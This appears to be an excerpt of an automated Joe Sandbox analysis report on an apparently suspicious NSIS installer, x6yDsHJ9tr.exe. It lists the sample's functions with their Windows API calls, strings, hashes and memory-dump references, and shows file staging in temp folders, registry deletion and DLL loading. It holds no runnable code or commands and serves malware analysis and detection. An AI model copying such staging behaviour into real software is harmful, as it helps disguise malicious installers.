Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\x6yDsHJ9tr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3264494702
Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

Function 004066BF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004067B2
user32::EnumWindows(i r1 ,i 0), xrefs: 004068B8
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406883
Call, xrefs: 004066EC, 004067A6, 004067AD, 004067B1, 004067CA, 004067CB, 004067E0, 004067F6, 00406827, 00406853, 00406888, 0040688E, 004068AB, 004068BE, 004068DC, 004068E2, 004068EB, 00406920

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
API String ID: 4024019347-3319343437
Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017DA

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Strings

C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll, xrefs: 0040183A, 00401856
C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 004017A3
C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 00401826, 00401844
Call, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp$C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Call
API String ID: 1941528284-2520172072
Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1

Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406269

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

Function 00406A06 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
wsprintfW.USER32 ref: 00406A58
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C

Strings

%s%S.dll, xrefs: 00406A52
UXTHEME, xrefs: 00406A0F

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

Function 73471817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73471BFF: GlobalFree.KERNEL32(?), ref: 73471E74
Part of subcall function 73471BFF: GlobalFree.KERNEL32(?), ref: 73471E79
Part of subcall function 73471BFF: GlobalFree.KERNEL32(?), ref: 73471E7E

GlobalFree.KERNEL32(00000000), ref: 734718C5
FreeLibrary.KERNEL32(?), ref: 7347194B
GlobalFree.KERNEL32(00000000), ref: 73471970

Part of subcall function 7347243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7347246F

Part of subcall function 73472810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73471896,00000000), ref: 734728E0

Part of subcall function 73471666: wsprintfW.USER32 ref: 73471694

Strings

, xrefs: 73471951

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: c17f86ab42e2b129b5164586608726cb546139744062f98505920a9037d9a475
Instruction ID: 9a0ce559947c9a4ef43a99acdad2e4ef123c716e16f867b8ae827eef6ce64b24
Opcode Fuzzy Hash: c17f86ab42e2b129b5164586608726cb546139744062f98505920a9037d9a475
Instruction Fuzzy Hash: 9741B3B24003459FEB1D9F20D988BD537BCEF04350F184469E94BAA2D6DB78C085CB68

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

Function 004020DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196

Strings

@f, xrefs: 0040215B

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: @f
API String ID: 334405425-729109391
Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
API String ID: 2655323295-917692060
Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

Function 004061A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004061BF
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004061A6
nsa, xrefs: 004061AE

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 0040600A
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
API String ID: 1892508949-3948318427
Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E

Function 004071D5 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

